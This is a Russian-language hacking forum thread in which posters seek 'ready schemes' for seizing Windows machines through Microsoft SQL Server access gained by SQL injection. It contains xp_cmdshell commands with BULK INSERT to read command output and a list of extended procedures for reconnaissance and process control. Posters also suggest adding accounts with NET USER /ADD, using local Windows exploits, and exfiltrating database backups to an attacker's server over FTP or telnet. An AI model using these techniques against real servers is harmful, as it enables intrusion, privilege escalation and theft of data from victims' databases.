>>>exec xp_cmd_shell 'dir'>dir.txt' где лежит dir.txt

Файл лежит в C:\Windows\dir.txt

//Создаем таблицу и наполняем поле content файлом dir.txt
CREATE TABLE DIR(content TEXT NOT NULL);
BULK INSERT DIR FROM "C:\Windows\dir.txt";

//Посмотреть
SELECT content FROM DIR;

//no comments =)
DROP TABLE DIR;

Должно работать, но не уверен

А как насчет залить исполнить файл...
Повысить права добавить юзера...

А может в C:\Windows\System32 ???
почитай про NET USER /ADD

Мало чего извлек...
Файл по идее должен сохраняться в папке с испоняемым файлом mssql.exe
Добавление юзера не включает удаленного ремот декспота.

Если нечего написсать не пишите я спрашиваю о готовых схемах захвата машины...

up.
Тема не раскрыта.
Интересно с кем нить пообщаться на эту тему.

xp_enumgroups (группы из ОС Windows)
xp_ntsec_enumdomains (список доменов сети)
xp_enumdsn (источники данных ODBC)
xp_loginconfig (инфо о пользователе)
xp_logininfo (все пользователи, залогинившиеся на данныйц момент в системе)
xp_msver (версия SQL сервера)
xp_cmdshell <команда> (исполнение файла через cmd.exe)
xp_servicecontrol <действие>,<служба> (запускает или останавливает указанные процесс)
xp_terminate_process <идентификатор процесса> (закрытие процесса по его ProcessID)
xp_startmail, xp_sendmail (обращение к потовому демону sendmail)
sp_makewebtask (выполнение команды html вида)

ну готовую схему тебе врядли дадут. но вариатнтов много - поднять права с помощью бажного сервиса.. имхо локальные сплоиты под винду всегда есть.. если конечно в данном случае она не патченая.) насчет первого поста - что тебе мешает задать полный путь раз. а второе .. все сохранятеся в локальной папке вроде как

__________________

[ cash ]
интересует таже тема, а особенно готовые варианты, есть иньекция mssql на asp база стоит под sa ...как задампить и слить её , как узнать путь куда куда её сохранить и откуда потом скачать....про добавление юзера тоже интересно, ты полюбому уже разобрался с этой темой...посоветуй чего-нибудь...

можно извратом через wsprintfA записать код исполняемого файла и затем выполнить. а можно через telnet подсоединиться к своему серверу и перенаправить результат в ехе, но этот более "красивый" способ может испортить фаерволл к примеру.
2$jason$ дамп это не проблема, точнее не дамп, а резервная копия - это уже ищите через поисковики. после резерва можно через ftp отправить файл на свой сервер и у себя локально уже восстановить.